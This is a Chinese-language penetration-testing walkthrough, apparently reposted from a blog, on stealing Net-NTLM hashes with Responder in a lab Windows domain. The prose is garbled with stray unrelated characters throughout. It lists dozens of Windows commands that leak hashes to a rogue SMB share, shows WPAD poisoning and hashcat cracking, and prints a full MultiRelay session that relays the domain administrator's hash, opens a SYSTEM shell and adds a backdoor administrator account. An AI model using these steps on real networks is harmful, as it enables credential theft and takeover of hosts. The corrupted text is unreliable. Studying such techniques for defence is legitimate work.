原文鏈接：http://wyb0.com/posts/responder-and-ntml-hash/

0x00 一些概念

• Windows認(rèn)證協(xié)議
  分為：基于NTML的認(rèn)證和基于kerberos的認(rèn)證

• 什么是NTLM Hash宣蠕？
  早期IBM設(shè)計(jì)的LM Hash算法存在弱點(diǎn)终息，微軟在保持向后兼容性的同時(shí)提出了自己的挑戰(zhàn)響應(yīng)機(jī)制，即NTLM Hash

• 什么是Challenge-Response挑戰(zhàn)/響應(yīng)驗(yàn)證機(jī)制晒骇？

  • Client輸入username霞怀、password与倡、domain距帅，然后將用戶名及密碼hash后存在本地抖仅，并將username發(fā)送到 DC
  • DC生成一個(gè)16字節(jié)的隨機(jī)數(shù)交煞，即Challenge(挑戰(zhàn)碼)咏窿，然后傳回Client
  • Client收到Challenge后將密碼hash和challenge混合hash，混合后的hash稱為response素征，然后將challenge集嵌、response和username發(fā)送給Server
  • Server將收到的3個(gè)值轉(zhuǎn)發(fā)給DC，然后DC根據(jù)傳過來的username到域控的賬號數(shù)據(jù)庫ntds.list找到對應(yīng)的密碼hash御毅，將hash和Client傳過來的challenge混合hash根欧，將這個(gè)混合hash與Client傳過來的response進(jìn)行對比驗(yàn)證

• NTLM Hash與Net-NTLM Hash

  • NTLM Hash通常是指Windows系統(tǒng)下Security Account Manager中保存的用戶密碼hash，通扯饲可從Windows系統(tǒng)中的SAM文件和域控的NTDS.dit文件中獲得所有用戶的hash（比如用Mimikatz提确锎帧），“挑戰(zhàn)/響應(yīng)驗(yàn)證”中的用戶名及密碼hash就是NTLM Hash
  • Net-NTLM Hash通常是指網(wǎng)絡(luò)環(huán)境下NTLM認(rèn)證中的hash今豆，“挑戰(zhàn)/響應(yīng)驗(yàn)證”中的response中包含Net-NTLM hash嫌拣，用Responder抓取的就是Net-NTLM Hash

• 關(guān)于Responder
  由Laurent Gaffie撰寫的 Responder 是迄今為止柔袁，在每個(gè)滲透測試人員用于竊取不同形式的證書（包括Net-NTLM hash）的最受歡迎的工具。它通過設(shè)置幾個(gè)模擬的惡意守護(hù)進(jìn)程（如SQL服務(wù)器异逐，F(xiàn)TP捶索，HTTP和SMB服務(wù)器等）來直接提示憑據(jù)或模擬質(zhì)詢 – 響應(yīng)驗(yàn)證過程并捕獲客戶端發(fā)送的必要 hash。Responder也有能力攻擊LLMNR灰瞻，NBT-NS和mDNS等協(xié)議腥例。

• 什么是NTLM中繼攻擊？
  攻擊者可以直接通過LM Hash和NTLM Hash訪問遠(yuǎn)程主機(jī)或服務(wù)酝润，而不用提供明文密碼燎竖。

0x01 軟件環(huán)境

• 可以從https://github.com/lgandx/Responder下載Responder
• 域內(nèi)主機(jī)：Win7（10.11.11.20）
• 域控主機(jī)：Win2008（10.11.11.18）
• 被控主機(jī)：Ubuntu14.04（10.11.11.11）和目標(biāo)機(jī)同一網(wǎng)段

0x02 通過SMB服務(wù)獲取Net-NTLM hash

對于SMB協(xié)議，客戶端在連接服務(wù)端時(shí)要销，默認(rèn)先使用本機(jī)的用戶名和密碼hash嘗試登錄底瓣，所以可以模擬SMB服務(wù)器從而截獲hash，執(zhí)行如下命令都可以得到hash

net.exe use \\host\share
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share #(noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share #(noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share #(this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share #(noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share #(noisy, pops an error dialog)
fvenotify.exe \\host\share #(noisy, pops an access denied error)
FXSCOVER.exe \\host\share #(noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share #(noisy, will pop an explorer window with the  contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share #(sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share #(noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share #(noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share #(noisy, invalid path to png error)
mspaint.exe \\host\share\share.png #(will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share #(noisy, error)
mstsc.exe \\host\share #(noisy, error)
netcfg.exe -l \\host\share -c p -i foo

• 被控主機(jī)執(zhí)行：$ sudo python Responder.py -I eth0 -v

  
  
  image

0x03 通過文件包含獲取Net-NTLM hash

• 被控主機(jī)執(zhí)行：$ sudo python Responder.py -I eth0 -v

  
  
  image

0x04 通過XSS獲取Net-NTLM hash

• 被控主機(jī)執(zhí)行：$ sudo python Responder.py -I eth0 -v

  
  
  image

0x05 WPAD代理服務(wù)器抓取Net-NTLM hash

WPAD用于在windows中自動(dòng)化的設(shè)置ie瀏覽器的代理蕉陋，從Windows 2000開始該功能被默認(rèn)開啟捐凭。

開啟Responder的WPAD后，當(dāng)PC瀏覽網(wǎng)站時(shí)即可抓取到NTLM hash

加-F參數(shù)即可開啟WPAD抓取 hash凳鬓，而且當(dāng)主機(jī)重啟時(shí)也能抓到NTLM hash

• 被控主機(jī)執(zhí)行：$ sudo python Responder.py -I eth0 -v -F

  
  
  image
  
  
  image

0x06 使用hashcat解密

• 安裝hashcat(參考這里)

$ git clone https://github.com/hashcat/hashcat.git
$ mkdir -p hashcat/deps
$ git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
$ cd hashcat
$ make
$ ./example0.sh
$ ./hashcat

• 利用hashcat暴力猜解密碼
  -m：hash-type茁肠，5600對應(yīng)NetNTLMv2
  
  image
  
  得到密碼為123456
  
  image

0x07 通過NTLM中繼攻擊添加用戶

這里就用到了NTLM中繼攻擊，相當(dāng)于是中間人攻擊缩举，攻擊者獲取高權(quán)限的主機(jī)的hash垦梆，然后將hash轉(zhuǎn)發(fā)給低權(quán)限主機(jī)并執(zhí)行命令

這里就是抓取域控的hash，然后執(zhí)行命令得到域內(nèi)主機(jī)的信息

• 修改Responder.conf仅孩，不啟動(dòng)SMB和HTTP托猩，然后啟動(dòng)Responder

reber@ubuntu:~/Responder$ head -n 14 Responder.conf
[Responder Core]

; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = Off
DNS = On
LDAP = On

#這里用的是-F，只要有高權(quán)限用戶通過瀏覽器訪問網(wǎng)頁就會(huì)中招辽慕，hash就會(huì)被抓取
reber@ubuntu:~/Responder$ sudo python Responder.py -I eth0 -v -F

• 利用Responder的MultiRelay模塊獲取shell

reber@ubuntu:~/Responder/tools$ sudo python MultiRelay.py -t 10.11.11.20 -u ALL

Responder MultiRelay 2.0 NTLMv1/2 Relay

Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.

/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.

This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/

Relaying credentials for these users:
['ALL']


Retrieving information for 10.11.11.20...
SMB signing: False
Os version: 'Windows 7 Professional 7600'
Hostname: 'WIN-7'
Part of the 'REBER' domain
[+] Setting up HTTP relay with SMB challenge: f34fb4118e70e824
[+] Received NTLMv2 hash from: 10.11.11.18
[+] Client info: ['Windows Server 2008 R2 Enterprise 7600', domain: 'REBER', signing:'True']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate

Available commands:
dump               -> Extract the SAM database and print hashes.
regdump KEY        -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File  -> Read a file (eg: read /windows/win.ini)
get  Path_To_File  -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \windows\temp\
runas  Command     -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot  IP address  -> Connect to another host (eg: pivot 10.0.0.12)
mimi  command      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32  command    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd  command      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help               -> Print this message.
exit               -> Exit this shell and return in relay mode.
                      If you want to quit type exit and then use CTRL-C

Any other command than that will be run as SYSTEM on the target.

Connected to 10.11.11.20 as LocalSystem.
C:\Windows\system32\:#net user test 123456 /add && net localgroup administrators test /add
????????ɡ?


C:\Windows\system32\:#net user

\\ ????????

-------------------------------------------------------------------------------
Administrator            Guest                    reber
test
???????????????????????????


C:\Windows\system32\:#exit
[+] Returning in relay mode.
Exiting...
reber@ubuntu:~/Responder/tools$

Reference(侵刪)：

• https://apt404.github.io/2016/08/11/ntlm-kerberos
• http://www.4hou.com/system/9383.html
• https://3gstudent.github.io/Windows下的密碼NTLM-hash和Net-NTLM-hash介紹
• https://gist.github.com/anonymous/70f792d50078f0ee795d39d0aa0da46e
• https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes
• https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745
• https://www.anquanke.com/post/id/85004
• https://www.phillips321.co.uk/2016/07/09/hashcat-on-os-x-getting-it-going